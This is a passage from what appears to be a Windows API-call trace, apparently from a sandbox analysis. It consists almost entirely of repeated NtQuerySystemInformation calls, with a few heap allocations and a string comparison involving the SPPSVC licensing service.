SystemInformation=0xa78207ca30, Length=0x20, ResultLength=0x0) [0284.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d300, Length=0x28, ResultLength=0x0) [0284.854] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.854] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d150, Length=0x28, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0284.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0284.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0284.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0284.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d300, Length=0x28, ResultLength=0x0) [0284.874] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d380, Length=0x50, ResultLength=0x0) [0284.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0e0, Length=0x28, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d150, Length=0x28, ResultLength=0x0) [0284.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.884] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0284.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1d0, Length=0x28, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0b0, Length=0x20, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d2b0, Length=0x38, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d130, Length=0x20, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d0c0, Length=0x20, ResultLength=0x0) [0284.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.892] GetProcessHeap () returned 0x269489b0000 [0284.892] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c710e0 [0284.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.925] GetProcessHeap () returned 0x269489b0000 [0284.925] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x26949c71230 [0284.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207da40, Length=0x50, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0284.942] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0284.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0284.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d930, Length=0x50, ResultLength=0x0) [0284.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0284.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d690, Length=0x28, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d700, Length=0x28, ResultLength=0x0) [0284.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0284.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d780, Length=0x28, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d620, Length=0x20, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0284.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d5a0, Length=0x20, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d860, Length=0x38, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d6e0, Length=0x20, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d670, Length=0x20, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dc90, Length=0x50, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207db80, Length=0x50, ResultLength=0x0) [0284.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d8e0, Length=0x28, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.967] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d950, Length=0x28, ResultLength=0x0) [0284.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207dab0, Length=0x38, ResultLength=0x0) [0284.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d9d0, Length=0x28, ResultLength=0x0) [0284.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.972] NtQuerySystemInformation 